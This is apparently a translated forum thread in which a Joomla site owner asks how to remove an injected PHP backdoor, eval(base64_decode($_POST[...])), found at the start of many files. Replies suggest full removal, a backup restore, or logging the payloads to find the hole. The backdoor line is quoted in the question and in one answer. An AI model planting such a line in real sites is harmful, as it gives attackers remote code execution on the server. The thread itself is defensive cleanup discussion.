How to get rid of base64_decode code in a page?

L

leopardo112014-06-20 19:20:39

PHP

leopardo11, 2014-06-20 19:20:39

There is a site on joomla, the mail () function was stopped on the hosting due to spam, rummaging through the site, I found such codes <?php eval(base64_decode($_POST['n08c394']));?> at the beginning of php files? but when I start deleting some, the site stops working. How to get rid of them correctly?
Site on Joomla, completely deleting the site is not an option, the site is working

Reply

Answer the question

In order to leave comments, you need to log in

5 answer(s)

M

maddog670, 2014-06-20
@leopardo11

Such code is regarded as malicious, it is recommended to remove it completely
from the very beginning to the end and check the files for the insertion of this code
<?php eval(base64_decode($_POST['n08c394']));?>

L

leopardo11, 2014-06-20
@leopardo11

Yes, I renamed it with a script eval(base64_decode($_POST['n08c394'])); to eval(blabla($_POST['n08c394']));

P

Puma Thailand, 2014-06-20
@opium

restore website from backup

I

Ivan Soshnikov, 2014-06-20
@soshnikov

It would be better to save "base64_decode($_POST['n08c394'])" with the accompanying info to the log and see what is launched there and where it comes from.
Understanding is the surest way to solve a problem. I understand that removing this rubbish will not close the hole through which it was formed.